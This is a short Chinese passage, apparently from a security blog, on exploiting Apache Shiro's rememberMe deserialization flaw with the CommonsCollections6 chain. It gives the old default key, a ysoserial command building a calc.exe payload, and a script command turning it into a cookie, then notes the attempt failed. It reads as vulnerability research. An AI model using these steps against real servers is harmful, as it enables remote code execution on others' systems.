前言
在Shiro中的利用可真是复杂
利用CC6攻击Shiro
使用CC6链生成payload,进行利用。shiro 1.2.4以下默认使用密钥为kPH+bIxk5D2deZiIxcaaaA==
。
通过yso获取序列化对象。
java -jar ysoserial.jar CommonsCollections6 "calc.exe" > result.ser
然后通过Serfile_to_rememberme.py
生成payload。
python3 Serfile_to_rememberme.py kPH+bIxk5D2deZiIxcaaaA== result.ser > 1.txt
工具地址:https://github.com/Vicl1fe/Tools/blob/main/%E5%B0%8F%E5%B7%A5%E5%85%B7/Shiro%E5%BA%8F%E5%88%97%E5%8C%96%E6%96%87%E4%BB%B6%E8%BD%ACrememberMe/Serfile_to_rememberme.py
发送payload,没有利用成功,tomcat报错如下。